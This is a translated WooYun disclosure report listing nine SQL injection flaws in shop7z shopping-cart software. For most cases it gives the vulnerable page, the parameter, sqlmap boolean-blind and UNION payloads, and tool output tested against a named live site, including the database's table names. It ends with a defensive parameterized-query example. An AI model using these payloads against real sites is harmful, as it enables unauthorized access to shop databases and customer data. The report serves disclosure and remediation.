
Vulnerability summary

Defect ID: wooyun-2015-0109753

Title: shop7z, nine SQL injections bundled

Vendor: shop7z

Author: gobal

Submitted: 2015-04-23 15:21

Fix deadline: 2015-06-07 15:22

Disclosed: 2015-06-07 15:22

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-04-23: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-06-07: The vendor has actively ignored the vulnerability; details are now disclosed to the public

Brief description:

shop7z, nine SQL injections bundled. I've submitted quite a few times already; it's tiring, but when I think of how many holes the reviewers have to go through, my own tiredness really doesn't count for much.

Detailed description:

Cases:
#1
Vulnerable file: /admin/dingdan_sendnot.asp
Vulnerable parameter: id (via POST)
TEST:http://www.125309.com/admin/dingdan_sendnot.asp

id=1


Place: POST
Parameter: id
Type: boolean-based blind
Title: Microsoft Access boolean-based blind - Parameter replace (original value)
Payload: id=IIF(2159=2159,1,1/0)
---
[19:37:57] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:37:57] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[19:37:57] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[19:37:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:37:57] [INFO] retrieved:
[19:37:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:37:58] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[19:37:58] [ERROR] cannot retrieve table names, back-end DBMS is Access
do you want to use common table existence check? [Y/n/q] y
[19:38:01] [INFO] checking table existence using items from 'D:\python\sqlmap\txt\common-tables.txt'
[19:38:01] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 9
[19:38:01] [INFO] starting 9 threads
[19:38:06] [INFO] retrieved: admin
[19:38:23] [INFO] retrieved: article
[19:40:37] [INFO] retrieved: ad
[19:41:05] [INFO] retrieved: message
Database: Microsoft_Access_masterdb
[4 tables]
+---------+
| ad |
| admin |
| article |
| message |
+---------+


#2
Vulnerable file: /admin/lipindel.asp (reachable without authorization)
Vulnerable parameter: id
TEST:http://www.125309.com/admin/lipindel.asp?id=1

Place: GET
Parameter: id
Type: boolean-based blind
Title: Microsoft Access boolean-based blind - Parameter replace (original value)
Payload: id=IIF(1449=1449,1,1/0)
---
[19:46:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:46:56] [INFO] fetched data logged to text files under 'D:\python\sqlmap\output\www.125309.com'
[*] shutting down at 19:46:56


#3
Vulnerable file: /show.asp?tk=shop7z
Vulnerable parameter: pkid (via POST)
TEST:http://www.125309.com/show.asp?tk=shop7z

pkid=1


Place: POST
Parameter: pkid
Type: UNION query
Title: Generic UNION query (NULL) - 38 columns
Payload: pkid=-2466 UNION ALL SELECT CHR(58)&CHR(120)&CHR(108)&CHR(112)&CHR(58)&CHR(111)&CHR(71)&CHR(69)&CHR(101)&CHR(89)&CHR(81)&CHR(101)&CHR(74)&CHR(104)&CHR(110)&CHR(58)&CHR(99)&CHR(106)&CHR(99)&CHR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%00
---
[19:48:36] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:48:36] [INFO] fetched data logged to text files under 'D:\python\sqlmap\output\www.125309.com'
[*] shutting down at 19:48:36


#4
Vulnerable file: orderpro_del.asp
Vulnerable parameter: id
TEST:http://www.125309.com/orderpro_del.asp?id=1

Place: GET
Parameter: id
Type: boolean-based blind
Title: Microsoft Access boolean-based blind - Parameter replace (original value)
Payload: id=IIF(2623=2623,1,1/0)
---
[19:50:23] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft Access
[19:50:23] [INFO] fetched data logged to text files under 'D:\python\sqlmap\output\www.125309.com'
[*] shutting down at 19:50:23


#5
Vulnerable file: show_foot.asp
Vulnerable parameter: c_id
TEST:http://www.125309.com/show_foot.asp?c_id=1

Place: GET
Parameter: c_id
Type: boolean-based blind
Title: Microsoft Access boolean-based blind - Parameter replace (original value)
Payload: c_id=IIF(3932=3932,1,1/0)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: c_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(58)&CHR(104)&CHR(115)&CHR(121)&CHR(58)&CHR(115)&CHR(90)&CHR(101)&CHR(90)&CHR(89)&CHR(79)&CHR(67)&CHR(102)&CHR(120)&CHR(119)&CHR(58)&CHR(102)&CHR(113)&CHR(107)&CHR(58),NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%00
---
[19:51:54] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:51:55] [INFO] fetched data logged to text files under 'D:\python\sqlmap\output\www.125309.com'
[*] shutting down at 19:51:55


#6
Vulnerable file: showone.asp
Vulnerable parameter: l_id
TEST:http://www.125309.com/showone.asp?l_id=1

Place: GET
Parameter: l_id
Type: boolean-based blind
Title: Microsoft Access boolean-based blind - Parameter replace (original value)
Payload: l_id=IIF(9827=9827,1,1/0)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: l_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(58)&CHR(122)&CHR(102)&CHR(104)&CHR(58)&CHR(113)&CHR(87)&CHR(69)&CHR(120)&CHR(108)&CHR(79)&CHR(88)&CHR(86)&CHR(109)&CHR(116)&CHR(58)&CHR(106)&CHR(116)&CHR(122)&CHR(58),NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%00
---
[19:53:38] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:53:38] [INFO] fetched data logged to text files under 'D:\python\sqlmap\output\www.125309.com'
[*] shutting down at 19:53:38


#7
Vulnerable file: /admin/dingdan_detail.asp (reachable without authorization)
Vulnerable parameter: id
TEST:http://www.125309.com/admin/dingdan_detail.asp?id=1

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9606=9606
---
[19:54:50] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:54:50] [INFO] fetched data logged to text files under 'D:\python\sqlmap\output\www.125309.com'
[*] shutting down at 19:54:50

Proof of vulnerability:

#8
Vulnerable file: /admin/chongzhimodify.asp (reachable without authorization)
Vulnerable parameter: id (via POST)
TEST:http://www.125309.com/admin/chongzhimodify.asp

id=1


Place: POST
Parameter: id
Type: boolean-based blind
Title: Microsoft Access boolean-based blind - Parameter replace (original value)
Payload: id=IIF(3785=3785,1,1/0)
---
[19:58:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[19:58:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 85 times
[19:58:56] [INFO] fetched data logged to text files under 'D:\python\sqlmap\output\www.125309.com'
[*] shutting down at 19:58:56


There is one more I'm not certain about, but it should be an injection.
#9
Vulnerable file: /admin/zhfbili.asp (reachable without authorization)
Vulnerable parameter: zhfbili (via POST)
TEST:http://www.125309.com/admin/zhfbili.asp

zhfbili=1'&Submit=+%B1%A3%B4%E6+&ok=1


Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误 在查询表达式 ''1''' 中。
/admin/zhfbili.asp,行 77

Fix recommendation:

RT (see the title)
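The report leaves the fix section empty, so here is an added example (not shop7z's code) of how an affected page such as /admin/dingdan_detail.asp could handle the id parameter safely in classic ASP against the Access back end: a session check for the admin pages, an allow-list check on the value, and an ADODB.Command parameter instead of string concatenation (the ODBC error above, with the query expression ''1''', is the symptom of concatenation). The connection object conn, the table name dingdan and the session key admin_user are assumptions.

```asp
<%
' Added example, not shop7z code. Assumed: conn is an open ADODB.Connection,
' the order table is "dingdan" and a logged-in admin is kept in Session("admin_user").
'
' Vulnerable pattern, reconstructed from the symptoms in this report:
'   sql = "SELECT * FROM dingdan WHERE id=" & Request("id")
' Whatever arrives in id (query string or POST body) becomes SQL text.

Const adInteger    = 3   ' ADO DataTypeEnum
Const adParamInput = 1   ' ADO ParameterDirectionEnum
Const adCmdText    = 1   ' ADO CommandTypeEnum

' 1. Admin pages must not be reachable without an authenticated admin session.
If Session("admin_user") = "" Then
    Response.Status = "403 Forbidden"
    Response.End
End If

' 2. Allow-list the value before it reaches the database: an order id is a
'    positive integer, so IIF(...) or UNION ... never gets past this point.
'    (IsNumeric is not enough; it accepts forms such as "1e3" and "&H10".)
Dim rawId : rawId = Trim(Request("id"))
Dim re : Set re = New RegExp
re.Pattern = "^[1-9][0-9]{0,8}$"
If Not re.Test(rawId) Then
    Response.Status = "400 Bad Request"
    Response.End
End If

' 3. Bind the value as a typed parameter; the Access ODBC driver receives it
'    as data, never as part of the statement. For string parameters such as
'    zhfbili, use adVarWChar (202) with an explicit size instead of adInteger.
Dim cmd : Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "SELECT * FROM dingdan WHERE id = ?"
cmd.CommandType = adCmdText
cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , CLng(rawId))

Dim rs : Set rs = cmd.Execute
If Not rs.EOF Then
    ' Encode on output so stored data cannot become script in the admin UI.
    Response.Write Server.HTMLEncode(rs("id"))
End If
rs.Close : Set rs = Nothing
Set cmd = Nothing
%>
```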

Copyright notice: please credit the source when reposting: gobal@WooYun


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively declined

Vulnerability Rank: 15 (WooYun rating)